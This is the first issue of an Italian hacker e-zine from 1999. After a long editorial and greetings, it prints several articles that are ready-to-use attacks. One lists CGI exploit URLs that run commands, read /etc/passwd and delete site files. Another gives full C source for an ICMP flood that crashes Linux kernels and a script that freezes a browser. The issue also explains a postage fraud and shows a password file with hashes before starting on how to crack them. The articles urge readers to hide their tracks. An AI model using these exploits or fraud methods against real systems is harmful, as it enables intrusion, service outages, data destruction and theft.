++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
      +/\ \  __/\ \                                   /\ \  BoBo & LaNdo +
      +\ \ \/\ \ \ \     __      ___     ___      __  \ \ \____     __   +
      + \ \ \ \ \ \ \  /'__`\  /' _ `\ /' _ `\  /'__`\ \ \ '__`\  /'__`\ +
      +  \ \ \_/ \_\ \/\ \ \.\_/\ \/\ \/\ \/\ \/\ \ \.\_\ \ \ \ \/\  __/ +
      +   \ `\___x___/\ \__/.\_\ \_\ \_\ \_\ \_\ \__/.\_\\ \_,__/\ \____\+
      +    '\/__//__/  \/__/\/_/\/_/\/_/\/_/\/_/\/__/\/_/ \/___/  \/____/+
      ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
			    Numero 0 - 1 ottobre 1999	
				
                      Se non ti va di leggere vola all'indice

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-Responsabilità:										     + 		
+Usa queste informazioni a tuo rischio e pericolo. Noi dell'e-zine Wannabe,  -
-l'Attila_Hack Crew e qualsiasi altra persona ci abbia aiutato a scrivere    +
+questa e-zine non si assumerà nessuna responsabilità per l'uso scorretto    -	
-questa rivista.    						             +
+Le seguenti informazioni sono state scritte solamente per scopo educativo e -
-informativo e non devono essere usate per scopi illegali, ma solo per       +
+difendersi da persone che usano queste informazioni in maniera sovversiva.  -
-                                      Attila_Hack Crew e Wannabe_1999 Staff +
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

Editoriale e saluti: (non tanto brevi:)) Ehehehe          26/settembre/1999
a cura di BoBo with collaboration Zio Marzo 
Salve ragazzi/e  questa nostra e-zines è nata il 20 giugno di questo anno quando 
per caso io e Zio Marzo ci siamo incontrati su irc e chattando un po siamo arrivati
alla conclusione che la scena underground hacker/cracker/phreaker poteva aver bisogno
di un'altra e-zine.
Ma perchè ancora una e-zine? Non ce ne sono già un casino in giro? Bhè in effetti di 
e-zine la scena underground italiana ne è piena, a partire dalla stupenda e inimitabile
BFI con cui colgo l'occasione per salutare \sPIRIT\, per poi passare a Newbies (Nobody 
e ZeroCool stanno facendo un ottimo lavoro), infine, come non nominare Netrunners e 
RigorMortis (no, ehehehehe Rigor_Mortem:), ti ricordi?), per la cronaca  è giusto citare
anche le ultime tre e-zine nate, una di Tormento, una di BoBByMetal "Hjacker" e un'altra 
"Anarchy in the system" di Oldiron61 che spero possano proseguire e diventare famose come 
Netrunners-BFI e Newbies.
Allora... ragazzi, questa e-zine è nata perchè anche l'Attila_Hack Crew voleva 
contribuire con una propria rivista dedicata all'h/c/p/v nella scena Italiana e volevamo 
rendere disponibili i molti articoli che arrivavano all'indirizzo e-mail di Attila_Hack,
quindi abbiamo cercato di unire l'utile al dilettevole :) formando una e-zine
che raccogliesse oltre agli articoli, le opinioni, le richieste e le critiche del suo
pubblico.
Allora... vorrei salutare: \\Ken e Julie-tte due miei amici di #kenshiro e #valvolin3 
(hei ken se non ci fossi tu come farebbero quelli della Valvoline Crew:)) 
P.S. siete
<Homer mode on> 
Stramiticuzzi :)Dheheheiiihhihiuhuhuhu
<Homer mode off>
Poi vorrei salutare TUTTA la Valvoline Crew (il vostro sito è semplicemente stupendo:)) e in
particolare valv0 che mi ha dato subito la sua disponibilità per "costruire" una e-zine 
decente (hei valv0 sei simpaticissimo ;-))
Poi un saluto particolare va a Quequero, una persona disponibile a risolvere ogni mio piccolo 
dubbio, oltre ad essere un cracker eccellente (boooni quelli della pavesi :)) è un mio grande
amico e non per niente è un Attila_Hack MemberZ :). Hei ancora non conoscete l'Università 
Italiana Crackers? AARRRGGGGHHHHHHH  Oddio ecchè c'e state affà ar mondo, il fantastico 
progetto U.I.C. del grande Quequero è diventato ora realtà, correte immediatamente ad
iscrivervi, il sito di Quequero lo trovate nella sezione links del sito di Attila_Hack o
alla fine di questa e-zine. 
Un grazie particolare va a b0nu$ anche lui Attila_Hack MemberZ, una persona mezzo uomo e
mezzo Tasm :) (vero Que?).
Poi ringrazio anche tutti gli altri Attila_Hack MemberZ che sono: Reset, Ritz, Away,
Xio Buttha (il cuggino di Buttha Spp Member) (da notare che le due g sono volontarie 
eheheh, vero Buttha? ;)), Kernel 2.3.3, IlCraccatore, TorpedoBlu e The Pac-Man per la 
loro collaborazione e per il supporto morale e pratico che mi hanno dato, Scully per 
le traduzioni che fa, Freak e Chewie (allora..il progetto pulce che fine ha fatto?).
I mieiei migliori saluti li mando a tutti gli Spp e in particolare a Buttha,
che è il Budda del newsgroup alt.hackers.cough.cough.cough, a Fritz per il malinteso 
che era sorto non molto tempo fa (beh spero che adesso diventeremo amici no?:)), e non posso
non rinominare Rigor_MorteM (uè, ma non mi dovevi mandare un articolo per l'e-zine, almeno
fatti sentire no? :)) 
Altri ringraziamenti vari vanno a tutti i RingZer0 e a quelli di #crack-it, in particolare
a Furb3t (che non risponde quasi mai alle mie mail :(), Neureal_en, sPEzio, Black Druid, e 
rinomino volentieri Away e Ritz che hanno scritto un bel po di articoli in pochi giorni 
(uau siete proprio dei bravi ragazzi :)), a Kalidor che doveva scrivere qualcosa per noi, 
ma non si è fatto più sentire, a Oldiron61 (uè Oldiron mi dispiace, ma i tuoi articoli non 
li possiamo mettere...motivo? Alcuni di noi non sono d'accordo nel trattare l'argomento 
Anarchy comunque complimenti per la tua e-zine che è davvero simpatica), a Lord Guf per le 
sue critiche costruttive :),  al root di dislessici.org (mi raccomando continuate così :)),
a Cavallo de Cavallis che quando gli ho chiesto se voleva scrivere qualcosa per noi mi ha 
risposto come risponde Homer e io non ho capito se era un si o un no :), a Mr_Skull, a LiQUID,
a BugByte, a S2,  ad Avatar,a CDP, a tutto lo Spaghetti Phreaker Team e poi....bho non mi 
ricordo più :) se mi sono dimenticato qualcuno segnalatemelo e provvederò all'uscita 
della prossima e-zine. 
Ah..due ringraziamenti particolarissimi vanno a Zio Marzo (questa e-zine è un idea anche sua :))
e a LaNdo che sarebbe il MAESTRO, il GURU di Linux e *nix, un mago della programmazione 
e il pistolero solitario delle reti, piu famoso con il nick: il server Vivente... Hehehe:).
Mi sono giunte voci che dicevano che Hack Nirvana era un Attila_Hack MemberZ.
QUESTO NON E' ASSOLUTAMENTE VERO. Adesso vorrei chiudere questa parentesi e non aprire 
+ discussioni su "Hack Nirvana Lamer o Hacker?", a questo ci penseranno gli Spp che a quanto
ho sentito sono stati attaccati direttamente da H_N.  
 
Beh con questo spero di aver finito vi voglio anche ricordare che per la realizzazione di
questa e-zine non è stata maltrattata nessuna bestia dello Zoo "Il Timone". Hei Valvoline
il tuo sito Fuck su quelli del timone mi ha fatto morire dal ridere Hahahaha, se non ci fossi
tu? Ti inventerei io ;) 
 
Ultima cosa e poi vi lascio in pace davvero :), allora... vi volevo solo dire che se non siete
soddisfatti dell'e-zine e avete qualche idea per migliorarla segnalatelo a 
attila_hack@hotmail.com e a wannabe_1999@hotmail.com, tutte le vostre critiche, obiezioni e 
tutti gli articoli che manderete saranno presi in considerazione e se saranno ritenuti/e
validi/e saranno pubblicati/e.
Per concludere (che???!?!??! ma ancora non te sei rotto de scrive sta cavolo de intro?)
si vabbè allora vi volevo finire di dire :) che tutti gli errori di itagliano e di inglese
sono copirait dell Wannabe Staff 1999:))).
Godetevi l'e-zine BoBo e Zio Marzo Attila_Hack MemberZ
(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack 
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it 
<======================================CUT HERE=======================================>
*------ ARTICOLI -------------------------&----------------------------- AUTORI ------*
<=====================================================================================>
#-[Manifesto degli Attila_Hack MemberZ e del Wannabe Staff]---------------------------#
#-[Sezione Hacking]-------------------------------------------------------------------#
#---[Cgi che passione!!!]--------------------------------------------+Mr_Skull+-------#
#---[Come Hackerare il servizio postale!]----------------------------+BoBo+-----------#
#---[Piccoli bug CRESCONO!]------------------------------------------+LaNdo+----------#
#---[E adesso che ho il file delle pwd?]-----------------------------+Zio Marzo+------#
#---[Come essere anonimi nel web, su irc e con l'invio di mail]------+Away+-----------#
#---[Come Hackerare i siti porno! E anche guida ai server Proxy]-----+LiQUID+---------#
#-[Sezione Cracking]------------------------------------------------------------------#
#---[First Crack]----------------------------------------------------+Away+-----------#
#---[Come craccare: "Ma quanto mi costi 3.0"]------------------------+Ritz+-----------#
#---[Come craccare PGP 5.5.5]---------------------------------------+Ritz+-----------#
#---[Manuale di cracking Prima parte]--------------------------------+S2+-------------#
#-[Sezione Programming]---------------------------------------------------------------#
#---[Impariamo l'Assembler-Prima parte-Intro, sist. di num. ed elem. di logica]+b0nu$+#
#-[Sezione Linux]---------------------------------------------------------------------#
#---[Installare Linux]-----------------------------------------------+LiQUID+---------#
#---[Ricompilare il Kernel]------------------------------------------+LaNdo+----------#
#---[Routing & Masquerading in Linux]--------------------------------+LaNdo+----------#
#-[Sezione Phreaking]-----------------------------------------------------------------#
#---[D'amore, di Phreaking e di altre sciocchezze]-------------------+The Pac-Man+----#
#---[Come crittare le telefonate e pagare un'urbana invece che un'interurbana]+BugByte#
#-[Sezione Lamah]---------------------------------------------------------------------#
#---[Come valangare di ping un ip con la legge dalla nostra parte]---+Mr.Lamah+-------#  
#---[Interagire con telnet e BO]-------------------------------------+Mr.Lamah+-------#  
#-[Sezione Viriing]-------------------------------------------------------------------#
#---[Virus che passione!!!]------------------------------------------+Ritz & Quequero+#
#-[Info varie]------------------------------------------------------------------------#
#---[Cosa sono e come si usano gli anonymous remailer]---------------+Quequero+-------#
#---[Come creare un Newsgroup!]--------------------------------------+BoBo+-----------#
#---[Come mantenere un sito Warez]-----------------------------------+LiQUID+---------#
#---[Due metodi per diventare OP con una botta di culo!!!]-----------+ZioButtha+------#
#---[Mandare SMS GRATISSS!!!(sia da internet sia dal cellulare)]+Spaghetti Team & BoBo#
#---[Come mandare SMS ANONIMIIIII!!!!]-------------------------------+The Crazy+------#
#-[Riflessioni del Wannabe staff]-----------------------------------------------------#
#---[Un blocco di testo inutile]-------------------------------------+S2+-------------#
#---[Per non dimenticare (Atomic)]-----------------------------------+Away+-----------#
#-[LinkZ a siti hacker, cracker e reverser]--------------------------+Reset+----------#
#-[Intervista all'Hacker di Jobs.com]--------------------------------+Reset+----------#
<======================================CUT HERE=======================================>

Manifesto degli Attila_Hack MemberZ e del Wannabe Staff:
Gli Attila_Hack MemberZ e il Wannabe Staff sono un gruppo di persone che si è unito per 
allargare le proprie conoscenze nei campi Hacker, Cracker, Reverser e Phreaker.
Il loro scopo è quello di aiutarsi a vicenda anche nei campi della programmazione e 
nell'utilizzo di sistemi operativi!! Non DEVE essere dimenticato che ogni membro 
è una singola persona, quindi, risponde e risponderà per le sue azioni come singolo,
senza incolpare altri Membri per aver attuato quello che era scritto in un articolo o
per aver utilizzato un informazione per scopi illegali. Gli Attila_Hack MemberZ e 
il Wannabe Staff si sono formati per scopo informativo e culturale, quindi in un 
paese come l'Italia in cui regna la libertà d'informazione veniamo considerati dallo
stato come un gruppo di persone che studia soltanto e non applica MAI le tecniche 
discusse e scritte dai membri.
						
						  Attila_Hack Crew e Wannabe_1999 Staff
								
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
 _______ _______ ______ _____  _____  __   _ _______
 |______ |______  ____/   |   |     | | \  | |__BoBo & LaNdo
 ______| |______ /_____ __|__ |_____| |  \_| |______
                                                    
 _     _ _______ _______ _     _ _____ __   _  ______
 |_____| |_____| |       |____/    |   | \  | |  ____
 |     | |     | |_____  |    \_ __|__ |  \_| |_____|           





				  CGI CHE PASSIONE: by Mr_Skull 

 ------------<[ /cgi-bin/ ]>------------------------------------------------------------
Autore: Mr_Skull
Consumo: 1 bicchiere d'acqua (bicchiere da 1 litro)
Musica ascoltata: Korn: Freak at a leash; The Immortals: Mortal Kombat Theme;
        Marilyn Manson: I don't like the drugs [but the drugs like me], Sweet
        dreams (are made of this)
Saluti: a mR_bIs0n, al NewBies Staff, a ZioMarzo, al bfi staff, e a tutti gli
        "smanettoni", nonch‚ ad Andrea Monti
Fuck a: tutti quelli che dicono di dire la verita dicendo di non dire mai la 
	verit...
Barzelletta: L'uomo con il volto da eterno fanciullo...-TG3 (era riferito
        a Bill Gate$)
------------------------Indice:
0) Disclaima
1) Cgi?
2) Il FAMOSISSIMO phf
3) Il FAMOSISSIMO perl
4) Il FAMOS... no, altri cgi
5) Cgi scanners
6) Conclusione
------------------------0) Disclaima
NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE NE FARETE DI QUESTE
INFORMAZIONI. SE SIETE UN WANNABE O NEWBIES O CHE DIR SI VOGLIA NON
DANNEGGIATE I SISTEMI. SE SIETE UN ROOT PERFAVORE NON PROTEGGETE I VOSTRI
SISTEMI :)
Una sera su irc viene ZioMarzo e mi dice:
<ZioMarzo>: ciao Mr, ti andrebbe di scrivere per una nuova e-zine?
(beh, veramente il dialogo era pi- luuuuungo, ma comunque...)
Naturalmente ho accettato, e cos eccomi qua a scrivere per Wannabe.
Da notare che io scrivo sia per Wannabe che per NewBies...
Dopo aver concordato sulla parcell... ehm, dopo una discussione, gli ho detto
vabb‚, scriver• qualcosa sul cgi...
Ed eccomi qua!
------------------------1) Cgi?
Cgi se non mi sbaglio (sbaglio) sta per Common Gateway Interface. Che vuol
dire? Aspe' che prendo il vocab... eh, vabb‚... non avete mai notato in un
sito web un link che vi dirotta su
www.sitochestatevisitando.com/cgi-bin/pinko.cgi?CICCIO%20+%20BEVE
?
Ecco, pinko.cgi Š un cgi! (intuizione degna di nota...). Un cgi Š un programma
scritto in c, perl, o che dir si voglia che pu• essere eseguito dal server
web. Nella cartella /cgi-bin ci sono tutti i cgi di un server.
E a noi che ce ne frega? Direte voi. Beh, se io vi dicessi che molti di kuesti
cgi sono exploitabili e che se alcuni girano come root potrete addirittura
eseguire dei comandi e vedere i risultati sul vostro browser di fiducia?
(LYNX FOR EVER!)
Qualche volta avrete sentito nominare
------------------------2) Il FAMOSISSIMO phf
Il phf Š il mio cgi preferito! Permette di eseguire tutti i komandi concessi
al web server, reindirizzando l'output sullo strumento che avete usato per
fare quel comando, anke sul BrOwSeR! E immaginate se il Web Server gira come
root ;). Se trovate un server vulnerabile a questo attacco, provate a digitare
questo:
www.servervulnerabileallattacco.gov/cgi-bin/phf?Qalias=x%0a/usr/bin/id
Se vi da come risultato uid = 0 e gid = 0, SIETE ROOT!
Ma aspettate, ultimamente mooooolti root difficilmente vi faranno entrare
nel cgi-bin... Comunque, quando ne trovate uno (come primo server tutto Š
lecito, anche www.sodomizing-systers.org(asmo)... ma non perdiamo il discorso.
Se vi pizzicasse la voglia di qualcosa di buono, prendete un ferrero rocher
(ok, la pianto con le scemenze).
Se al posto del comando id ci voleste mettere un bel cat /etc/passwd?
Semplice...
www.host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
ove %20 Š il codice ascii della barra spaziale. Se inoltre avete uid=gid=0
potrete eseguire *tutti* i comandi che potrebbe eseguire un root (okkio,
anche i web server loggano per•...).
Da notare: non omettete MAI il parametro Qalias=x%0a senn• non vi funziona
un kakka... Ma penso che l'avrete capito...
Bene, il phf Š disponibile solo su sistemi Unix e soci, ma se volessimo
bucare un server NT?
Eheheeh, Microsoft naturalmente fa solo prodotti che soddisfano gli utenti
(noi wannabe e gli hackers seri).
Allora, in assenza del piaccaeffe si usa
------------------------3) Il FAMOSISSIMO perl
Se avete trovato un web server lamer che gira su NT (non vi preoccupate, gi...
il fatto che girano su nt...), potrete provare ad utilizzare l'eseguibile
perl.exe che si trova nella cartella (indovinate un po') /cgi-bin
L'utilizzo di codesto eseguibile non si discosta molto dal phf... vi permette
di eseguire i comandi in linguaggio perl (grande intuizione)
Ad es.
Volete che il vostro amato perl elimini il sito? Niente di pi- facile:
www.sitochestapermorire.com/cgi-bin/perl.exe?-e+unlink+%3C*%3E
gli farete cos eseguire il comando unlink <*> infatti il parametro -e
serve a dire al perl di eseguire il comando che scriveremo dopo, e %3C e %3E
per chi non lo avesse ancora capito sono i codici ASCII di "<" e ">" senza
gli apici...
Naturalmente danneggiare un web server non Š affatto considerato 313373 e
potreste avere gravi rimorsi, sapendo di averlo fatto. Quindi, studiatevi
il perl e vedete tutti gli altri comandi fattibili...
Ora che ho parlato di phf e perl, i due progs pi- famosi, non mi resta che
------------------------4) Il FAMOS... no, altri cgi
Bene bene, vediamo un po' altri cgi spesso trascurati...
php.cgi (da non confondere con phf :)):
vi permette di visualizzare qualsiasi file (sempre che il web server ne abbia
il permesso). Ad esempio:
www.telekozz.it/cgi-bin/php.cgi?/etc/passwd
e se non vi esce un bel Not Allowed, avrete le password (criptate)!!!
view-source:
anche con questo potrete vedere un file qualsiasi...
Esempio:
www.telekozz.it/cgi-bin/view-source?../../../../../etc/passwd
NOTA: Š necessario andare prima nella dir. "/", cosicch‚ bisogna fare prima
un bel po' di ../ tanti quante sono le directory per le quali passa il web
server...
htmlscript:
funziona in modo analogo al viewsource quindi vedi sopra
query:
Vi pu• far eseguire dei comandi:
www.telekozz.it/cgi-bin/query?%0a/bin/cat%20/etc/passwd
bella vero?
nph-test-cgi:
vi fa vedere i files di una directory prescelta:
www.telekozz.it/cgi-bin/nph-test-cgi?/etc/*    ;contenuto della cartella /etc
www.telekozz.it/cgi-bin/nph-test-cgi?*         ;contenuto della cartella /cgi-bin/
Bene, io avrei phinito, ma devo dire che ci sono PAREKKI altri cgi, pi- di
60!!!
Ma come fare a provarli tutti???
Semplice, con i
------------------------5) Cgi scanners
Questi sono dei semplici programmini che si connettono all'indirizzo prescelto
sulla porta web e iniziano a provare tutti i cgi per i quali sono stati
programmati :)
Per chi avesse intenzione di farsene uno proprio, tenete queste dritte:
 * per prelevare un file dal web si usa il comando GET
 * conviene anche prendere informazioni sul web server usato
 * vedete cosa vi risponde e printate se Š affermativo o negativo, non la
   risposta, altrimenti inkasinate tutto all'utente medio.
Per i pi- pigri cercate su astalavista.box.sk o su www.rootshell.com
Troverete di sikuro kualkosa per voi ;)
Anche questa volta sono arrivato alla
------------------------0) Conclusione
Spero di avervi dilettato con questo articolo. Senn•, mi spiegate come avete
fatto a leggervi 178 righe?
Vi prego inoltre di segnalarmi eventuali errori concettuali (sono solo un
newbie io). Se volete contattarmi lo potete fare su IRC dalle 8 alle 9
(in genere) e mi trovate su #hackernow con il mio nick (Mr_Skull).
Saluti e mi raccomando, non bucate sistemi se non sapete nascondere il vostro
passaggio.
                                                                     Mr_Skull




-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
		         COME HACKERARE IL SERVIZIO POSTALE: by BoBo 
					
Data: 10 luglio 1999
Cibo consumato: una scatola di mangime per gatti :) sono le 4 di notte e ho 
un'aria felina :))
Musica ascoltata: The Cat Woman Theme, Occhi di gatto di bimbomix Compilation
  
Allora.... ragazzi e ragazze adesso parliamo dell'esame orale di maturità
che ho dato stamattina.....cosa??!?!?!??? Non ve ne frega niente.....vabbè,
parliamo di dove andrò in vacanza.... bhè???!!!! non vi importa niente neanche
di quello? 
Hehehe parliamo di come fottere il servizio postale?
Hey? anche questo non vi interessa? Perchèèè? Ah..ho capito allora voi la posta 
tradizionale non la usate più.... siete nati nell'era tecnologica e comunicate
solo tramite e-mail/irc/icq!!!! 
Beh, ma pur di qualcosa vi devo parlare noo?  Ci sarà qualcuno interessato su come
non pagare le lettere che invia da casa? 
Hei tu che alzi la mano li in fondo: 6° banco a destra vicino alla finestra, vuoi 
sapere come spedire lettere assolutamente gratis da casa? No?!? devi  solo andare
in bagno? e io nun-te-ce mando....tiè mo fattela sotto e ascolta chettedice BoBo:).  
allora...bando alle ciance, cominciamo:
Allora...questo metodo mi è venuto in mente non molto tempo fa, ed è strano
che sia venuto in mente proprio a me (maccheccavolo sto a dì)
Vabbè allora consiste nel riutilizzare le buste che vi arrivano a casuccia 
dallo Stato, io, personalmente utilizzo le buste della Playstation, quelle 
che arrivano con il catalogo dei giochi....insomma utilizzate le buste che 
vi pare basta che al posto del francobollo ci sia scritto "Spedizione in abbonamento
postale  Stampe non periodiche Autorizzazione Filiale di Milano-Roma-Napoli" (dipende
da dove abiti). Poi cambiate il destinatario con quello che vi pare et voilà 
le jeux sont fait.
Se non l'avete ancora capito, voi spedendo quella busta a chi vi pare non
pagherete una lira, infatti, sarà recapitata al vostro amico GRATIS.
Nota Finale: Per questa tecnica state sicuri io l'ho già provato e funge al 100*100.
Sennò adesso vi scriverei dar gabbio :)
Approfitto per ringraziare ZioMarzo, LaNdo, Scully, tutti gli Attila_Hack MemberZ,
gli amici di #crack-it e poi tutti quelli che gia ho salutato all'inizio :)).
P.S. Tutti gli errori di Itagliano sono puramente casuali e dovuti a circostanze misteriose:))





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
					PICCOLI BUG CRESCONO (!!!)
 
                                        by LaNdo  (from rootshell)
Bug Kernel 2.2.x 
Eccovi un bel bug del nuovo kernel di Linux....eheheheheh buon divertimento !!!!
Esiste un bug per quanto riguarda il nuovo kernel 2.2.x di Linux (testato su 2.2.7 e 2.2.9),
questo bug manda in "kernel panic" quando si spediscono al pc col suddetto kernel un grande
numero di pacchetti ICMP particolari.
Penso che la causa di questo sia dovuta ad una combinazione tra la lunghezza degli header e
 il cambio (random) di tipo, sottotipo e mittente dei pacchetti spediti.
Winzozz 9x e FreeBSD 3.0 non ne sono affetti.
Il codice sottostante (da usare sotto Linux) spedisce pacchetti random: modificando tipo,
sottotipo e mittente.
Questo codice potrebbe non "girare" sulla vostra distribuzione (questo non vuol dire che
non ne siete affetti...)
Il codice va compilato col compilatore del c++: g++ exploit.cpp -o exploit

----------------------------------------------------------------------------
			copia e incolla
----------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
    struct iphdr iph;
    struct icmp icp;
    char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
    long sum;
    u_short oddbyte, answer;
    sum = 0;
    while (nbytes > 1)
    {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1)
    {
        oddbyte = 0;
        *((u_char *)&oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
        struct hostent *host;
        if ((host = gethostbyname(address)) == NULL)
        {
                perror("Unable to get host name");
                exit(-1);
        }       
        struct sockaddr_in sin;
        bzero((char *)&sin, sizeof(sin));
        sin.sin_family = PF_INET;
        sin.sin_port = htons(prt);
        bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
        return(sin);
}
void main(int argc, char **argv)
{
        int sock, i, ctr, k;
        int on = 1;
        struct sockaddr_in addrs;
        if (argc < 3)
        {
                printf("Usage: %s <ip_addr> <port>\n", argv[0]);
                exit(-1);
        }
        for (i = 0; i < 1002; i++)
        {
            icmph.text[i] = random() % 255;
        }
        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
        {
            perror("Can't set IP_HDRINCL option on socket");
        }
        if (sock < 0)
        {
            exit(-1);
        }
        fflush(stdout);
        for (ctr = 0;ctr < 1001;ctr++)
        {
            ctr = ctr % 1000;
            addrs = sock_open(argv[1], sock, atoi(argv[2]));
            icmph.iph.version = 4;
            icmph.iph.ihl = 6;
            icmph.iph.tot_len = 1024;
            icmph.iph.id = htons(0x001);
            icmph.iph.ttl = 255;
            icmph.iph.protocol = IPPROTO_ICMP;
            icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
            ((random() % 255) * 65535) +
            ((random() % 255) * 255) +
            (random() % 255);
            icmph.iph.daddr = addrs.sin_addr.s_addr;
            icmph.iph.frag_off = htons(0);
            icmph.icp.icmp_type = random() % 14;
            icmph.icp.icmp_code = random() % 10;
            icmph.icp.icmp_cksum = 0;
            icmph.icp.icmp_id = 2650;
            icmph.icp.icmp_seq = random() % 255;
            icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
            if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
            {
                if (errno != ENOBUFS) printf("X");
            }
            if (ctr == 0) printf("b00m ");
            fflush(stdout);
        }
        close(sock);
}
----------------------------------------------------------------------------
			copia e incolla
----------------------------------------------------------------------------


Internet Explorer 5 bloccato
Questo codice se fatto "leggere" da Internet Explorer 5 con Javascript attivato
lo fa bloccare:
Divertitevi pure......... potete anche apportare delle variazioni al codice 
non è difficile:
---------------------------------------------------------------------------
				copia e incolla
---------------------------------------------------------------------------
<HTML>
<BODY>
<SCRIPT>
 
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
        document.bgColor = color[x]
        if(x == 2)
        {
                x = 0;
        }               
}
</SCRIPT>
</BODY>
</HTML>
---------------------------------------------------------------------------
				copia e incolla
---------------------------------------------------------------------------





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

 

 
			E ADESSO CHE HO IL FILE DELLE PASSWORD?: By ZioMarzo


-------->Vi avverto che questo articolo è solo per chi è già in possesso
del "famoso" file .<-------------
Credo che questa sia la domanda più ricorrente nella mente di un wannabe
quando riesce finalmente dopo tanti sforzi a reperire dalla grande rete un
file delle passwd , ho ragione vero ?
Ebbene in questo articolo cercherò di illuminarvi per evitare che in futuro
questo dubbio amletico continui ad assillarvi .
Una volta avuto il file è bene aprirlo ; basta un semplice editor di testo
( prima fatene una copia da qualche altra parte ) quando l'editor avrà aperto
il file , vi si presenterà uno spettacolo del genere : 
root:9IDv/CqdFuqWo:0:0:Super User:/:/bin/csh 
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
fax:*:3:10:Fax:/var/spool/fax:/bin/sh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
demos::993:997:Demonstration User:/usr/demos:/bin/csh
OutOfBox::995:997:Out of Box Experience:/usr/people/tour:/bin/csh
guest:iu77KKmsN2:998:998:Guest Account:/usr/adm/guest:/bin/csh
nobody:*:60001:60001:Nobody:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
www:*:20:10:The Web Slinger:/web/www:/bin/csh
webadmin:ecKu77KmsNALs:0:0:Sysadmin web account:/:/bin/sh
testact::1000:10:Test Account:/:/bin/mail
ftp:*:60001:60001:FTP ACCOUNT:/ftp:/dev/null
Bene , arrivati a questo punto tutti si chiedono : " e adesso cosa me ne faccio ? "
Guardate bene il contenuto del file , quelli sono tutte le login e le passwd di tutti
gli utenti e di tutti i servizi ; voi vi starete a chiedere come fare a distinguerle;
ve lo spiego io :
root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh <------- questa è la 1° riga cioè 
quella che riguarda il root o il sysadmin ( l'amministratore del sistema , quello che 
sguazza nei vostri dati e fa i suoi porci comodi solo perché ha una passwd di m…a )
La riga che vedete sopore può essere vista anche così : 
root: 9IDv/CqdFuqWo: 0: 0: Super User: /: /bin/csh 
Login: Passwd Criptata: UserID: GroupID: RealName: Home Directory: Shell
Ora che avete la passwd criptata non dovete far altro che decriptarla ; per fare questo
lavoro che risulterebbe impossibile altrimenti sono stati creati più programmi ma tra
questi uno si distingue : John The Ripper .
I furboni che hanno inventato Unix/Linux hanno anche inventato un metodo di criptazione
( il DES ) che è chiamato One-way ; one -way significa che da una parola normale si può 
risalire a quella criptata ma non il contrario .
Vi chiederete , ma se non è possibile decriptare le parole John The Ripper come fa ? 
Ebbene , questo magnifico programmino contiene delle liste di parole ( vocabolari ) che
